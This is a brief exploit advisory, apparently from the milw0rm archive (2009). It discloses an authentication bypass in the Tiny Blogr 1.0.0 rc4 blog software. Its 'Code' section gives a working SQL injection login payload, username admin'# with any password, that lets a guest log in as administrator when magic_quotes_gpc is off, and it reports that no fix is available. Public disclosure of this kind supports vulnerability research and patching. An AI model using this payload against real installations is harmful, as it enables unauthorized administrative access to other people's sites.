******* Salvatore "drosophila" Fresta ******* [+] Application: Tiny Blogr [+] Version: 1.0.0 rc4 [+] Website: http://tinyblogr.sourceforge.net [+] Bugs: [A] Authentication Bypass [+] Exploitation: Remote [+] Date: 17 Apr 2009 [+] Discovered by: Salvatore "drosophila" Fresta [+] Author: Salvatore "drosophila" Fresta [+] Contact: e-mail: drosophilaxxx@gmail.com ************************************************* [+] Menu 1) Bugs 2) Code 3) Fix ************************************************* [+] Bugs - [A] Authentication Bypass [-] Risk: medium [-] Requisites: magic_quotes_gpc = off [-] File affected: class.eport.php This bug allows a guest to bypass the authentication system. ************************************************* [+] Code - [A] Authenticaion Bypass Username: admin'# Password: foo ************************************************* [+] Fix No fix. ************************************************* # milw0rm.com [2009-04-17]